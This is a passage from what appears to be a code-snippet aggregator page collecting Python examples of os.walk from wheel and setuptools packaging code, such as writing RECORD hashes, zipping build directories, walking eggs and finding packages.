                radical = radical.lstrip('/')
                radical = radical.lstrip('\\')
            for path, dir, files in os.walk(prefix):
                path = os.path.normpath(path)
                for fn in _iglob(os.path.join(path, radical)):
                    yield fn
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def write_record(self, bdist_dir, distinfo_dir):
        """Write ``RECORD`` inside ``distinfo_dir`` for the tree at ``bdist_dir``.

        One CSV row ``(path, hash, size)`` is written per file found under
        ``bdist_dir``, visited in sorted order.  Paths are relative to
        ``bdist_dir`` and use ``/`` as separator.  ``hash`` is ``sha256=``
        followed by the url-safe base64 of the digest, and ``size`` is the
        byte length.  The row for ``RECORD`` itself has an empty hash and
        size.
        """
        from wheel.util import urlsafe_b64encode

        record_path = os.path.join(distinfo_dir, 'RECORD')
        record_relpath = os.path.relpath(record_path, bdist_dir)

        def iter_files():
            for parent, subdirs, names in os.walk(bdist_dir):
                # Sorting in place makes os.walk descend in sorted order too.
                subdirs.sort()
                for entry in sorted(names):
                    yield os.path.join(parent, entry)

        with open_for_csv(record_path, 'w+') as record_file:
            writer = csv.writer(record_file)
            # The walk is lazy and starts only after RECORD has been opened.
            for path in iter_files():
                relpath = os.path.relpath(path, bdist_dir)
                if relpath == record_relpath:
                    # RECORD cannot carry its own hash.
                    digest_field, size_field = '', ''
                else:
                    with open(path, 'rb') as stream:
                        data = stream.read()
                    raw_digest = hashlib.sha256(data).digest()
                    digest_field = 'sha256=' + native(
                        urlsafe_b64encode(raw_digest))
                    size_field = len(data)
                row_path = relpath.replace(os.path.sep, '/')
                writer.writerow((row_path, digest_field, size_field))
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def test_no_scripts():
    """Make sure entry point scripts are not generated.

    Every ``.whl`` found under the ``complex-dist`` resource directory of
    ``wheel.test`` is opened, and no archive member may have
    ``.data/scripts/`` in its name.
    """
    dist = "complex-dist"
    basedir = pkg_resources.resource_filename('wheel.test', dist)
    for (dirname, subdirs, filenames) in os.walk(basedir):
        for filename in filenames:
            if not filename.endswith('.whl'):
                continue
            # The context manager closes the archive even when the
            # assertion below fails.
            with ZipFile(os.path.join(dirname, filename)) as whl:
                for entry in whl.infolist():
                    assert '.data/scripts/' not in entry.filename
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def get_ext_outputs(self):
        """Return ``(all_outputs, ext_outputs)`` for ``self.bdist_dir``.

        ``all_outputs`` lists, as ``/``-separated paths relative to
        ``self.bdist_dir``, every file whose lower-cased extension is in
        ``NATIVE_EXTENSIONS``.

        ``ext_outputs`` lists the filenames of the ``build_ext`` extensions
        that are not ``Library`` instances, whose basename does not start
        with ``dl-``, and which exist under ``self.bdist_dir``.  It stays
        empty when the distribution has no extension modules.
        """
        # Maps each walked directory to its '/'-terminated relative prefix.
        prefixes = {self.bdist_dir: ''}
        native_files = []
        for base, dirs, files in os.walk(self.bdist_dir):
            prefix = prefixes[base]
            native_files.extend(
                prefix + name for name in files
                if os.path.splitext(name)[1].lower() in NATIVE_EXTENSIONS)
            # Register the children before os.walk descends into them.
            for sub in dirs:
                prefixes[os.path.join(base, sub)] = prefix + sub + '/'

        built_exts = []
        if self.distribution.has_ext_modules():
            build_cmd = self.get_finalized_command('build_ext')
            for ext in build_cmd.extensions:
                if isinstance(ext, Library):
                    continue
                filename = build_cmd.get_ext_filename(
                    build_cmd.get_ext_fullname(ext.name))
                if os.path.basename(filename).startswith('dl-'):
                    continue
                if os.path.exists(os.path.join(self.bdist_dir, filename)):
                    built_exts.append(filename)

        return native_files, built_exts
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def walk_egg(egg_dir):
    """Walk an unpacked egg's contents, skipping the metadata directory.

    Yields the same ``(base, dirs, files)`` triples as ``os.walk(egg_dir)``,
    except that a top-level ``EGG-INFO`` directory is removed from the first
    triple and therefore never descended into.  Yields nothing when
    ``os.walk`` produces nothing for ``egg_dir`` (for example when the
    directory does not exist).
    """
    walker = os.walk(egg_dir)
    # A bare next() would let StopIteration escape from this generator when
    # the walk is empty; under PEP 479 that surfaces as RuntimeError.
    first = next(walker, None)
    if first is None:
        return
    base, dirs, files = first
    if 'EGG-INFO' in dirs:
        # In-place removal is what stops os.walk from entering it.
        dirs.remove('EGG-INFO')
    yield base, dirs, files
    for bdf in walker:
        yield bdf
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create the zip file 'zip_filename' from all the files under 'base_dir'.

    Archive member names are the file paths relative to 'base_dir'.  The
    directory part of 'zip_filename' is passed to mkpath() first.  With
    'dry_run' true the tree is still walked and logged, but no archive is
    opened or written.  'compress' selects ZIP_DEFLATED (true) or ZIP_STORED
    (false), and 'mode' is passed to zipfile.ZipFile.  'verbose' is accepted
    but not used here.  Returns 'zip_filename'.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                # relpath instead of slicing by len(base_dir): slicing
                # mangles the member name when base_dir is '.' or ends
                # with a path separator.
                p = os.path.relpath(path, base_dir)
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'", p)

    compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
    z = None
    if not dry_run:
        z = zipfile.ZipFile(zip_filename, mode, compression=compression)
    try:
        for dirname, dirs, files in os.walk(base_dir):
            visit(z, dirname, files)
    finally:
        # Close the archive even if adding a file fails part-way.
        if z is not None:
            z.close()
    return zip_filename
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def add_output(self, path):
        """Record ``path`` in ``self.outputs``.

        A directory contributes every file found by walking it, each joined
        to the directory it was found in.  Any other path is appended
        exactly as given.
        """
        if not os.path.isdir(path):
            self.outputs.append(path)
            return
        for base, _dirs, files in os.walk(path):
            self.outputs.extend(os.path.join(base, name) for name in files)
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def create_zipfile(self, filename):
        """Zip the contents of ``self.target_dir`` into ``filename``.

        Member names are the file paths relative to ``self.target_dir``.
        Raises ``DistutilsOptionError`` when the top level of
        ``self.target_dir`` contains no files.  The archive is closed in
        every case.
        """
        archive = zipfile.ZipFile(filename, "w")
        try:
            self.mkpath(self.target_dir)  # just in case
            for dirpath, _subdirs, names in os.walk(self.target_dir):
                at_top = dirpath == self.target_dir
                if at_top and not names:
                    raise DistutilsOptionError(
                        "no files found in upload directory '%s'"
                        % self.target_dir)
                # Location of this directory inside the archive.
                arc_dir = dirpath[len(self.target_dir):].lstrip(os.path.sep)
                for name in names:
                    archive.write(os.path.join(dirpath, name),
                                  os.path.join(arc_dir, name))
        finally:
            archive.close()
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def _find_packages_iter(cls, where, exclude, include):
        """
        All the packages found in 'where' that pass the 'include' filter, but
        not the 'exclude' filter.
        """
        for root, dirs, files in os.walk(where, followlinks=True):
            # Copy dirs to iterate over it, then empty dirs.
            all_dirs = dirs[:]
            dirs[:] = []

            for dir in all_dirs:
                full_path = os.path.join(root, dir)
                rel_path = os.path.relpath(full_path, where)
                package = rel_path.replace(os.path.sep, '.')

                # Skip directory trees that are not valid packages
                if ('.' in dir or not cls._looks_like_package(full_path)):
                    continue

                # Should this package be included?
                if include(package) and not exclude(package):
                    yield package

                # Keep searching subdirectories, as there may be more packages
                # down there, even if the parent was excluded.
                dirs.append(dir)